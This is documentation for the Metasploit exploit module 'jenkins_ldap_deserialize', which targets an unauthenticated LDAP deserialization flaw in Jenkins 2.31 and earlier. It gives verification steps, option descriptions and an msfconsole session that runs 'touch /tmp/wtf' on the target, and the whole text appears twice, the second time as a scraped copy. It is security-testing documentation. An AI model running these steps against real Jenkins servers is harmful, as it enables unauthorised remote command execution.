documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md

## Vulnerable Application

Jenkins 2.31 or below is vulnerable and can be downloaded from [updates.jenkins-ci.org](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)

This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.


## Verification Steps

  1. Download [jenkins 2.31](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)
  2. Install jenkins ```java -jar jenkins.war```
  3. Start ```msfconsole```
  4. Do: ```use exploit/linux/misc/jenkins_ldap_deserialize```
  5. Do: ```set RHOST [target host]```
  6. Do: ```set PAYLOAD cmd/unix/generic```
  7. Do: ```set CMD 'touch /tmp/wtf'```
  8. Do: ```run```
  7. It should create /tmp/wtf on the target host.

## Required Options

  **RHOST**

  The address of the jenkins server.


## Options

  **RPORT**

  The http port for the jenkins server. (Defaults to 8080)

  **TARGETURI**

  The path to the target instance of Jenkins. (Defaults to /)

  **SRVHOST**

  The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

  **SRVPORT**

  The local port to listen for the LDAP request on. (Defaults to 1389)

  **LDAPHOST**

  The ldap host the exploit will connect to. Can be different from ```SRVHOST``` if in a environment where there is port forwarding. (Defaults to 127.0.0.1)


## Scenarios

  Example usage against a unix target running Jenkins 2.31.

  ```
  msf > use exploit/linux/misc/jenkins_ldap_deserialize
  msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
  TARGETURI => /
  msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
  RHOST => 127.0.0.1
  msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
  RPORT => 8080
  msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
  PAYLOAD => cmd/unix/generic
  msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
  CMD => touch /tmp/wtf
  msf exploit(jenkins_ldap_deserialize) > run
  [*] Exploit completed, but no session was created.

  ```
Module documentation for jenkins_ldap_deserialize 2017-01-18 23:44:32 +00:00			`## Vulnerable Application`

			`Jenkins 2.31 or below is vulnerable and can be downloaded from [updates.jenkins-ci.org](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)`

			`This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.`


			`## Verification Steps`

			`1. Download [jenkins 2.31](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)`
			2. Install jenkins ```java -jar jenkins.war```
			3. Start ```msfconsole```
			4. Do: ```use exploit/linux/misc/jenkins_ldap_deserialize```
			5. Do: ```set RHOST [target host]```
			6. Do: ```set PAYLOAD cmd/unix/generic```
			7. Do: ```set CMD 'touch /tmp/wtf'```
			8. Do: ```run```
			`7. It should create /tmp/wtf on the target host.`

			`## Required Options`

			`RHOST`

			`The address of the jenkins server.`


			`## Options`

			`RPORT`

			`The http port for the jenkins server. (Defaults to 8080)`

			`TARGETURI`

			`The path to the target instance of Jenkins. (Defaults to /)`

			`SRVHOST`

			`The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)`

			`SRVPORT`

			`The local port to listen for the LDAP request on. (Defaults to 1389)`

			`LDAPHOST`

			The ldap host the exploit will connect to. Can be different from ```SRVHOST``` if in a environment where there is port forwarding. (Defaults to 127.0.0.1)


			`## Scenarios`

			`Example usage against a unix target running Jenkins 2.31.`

			```
			`msf > use exploit/linux/misc/jenkins_ldap_deserialize`
			`msf exploit(jenkins_ldap_deserialize) > set TARGETURI /`
			`TARGETURI => /`
			`msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1`
			`RHOST => 127.0.0.1`
			`msf exploit(jenkins_ldap_deserialize) > set RPORT 8080`
			`RPORT => 8080`
			`msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic`
			`PAYLOAD => cmd/unix/generic`
			`msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'`
			`CMD => touch /tmp/wtf`
			`msf exploit(jenkins_ldap_deserialize) > run`
			`[*] Exploit completed, but no session was created.`

			```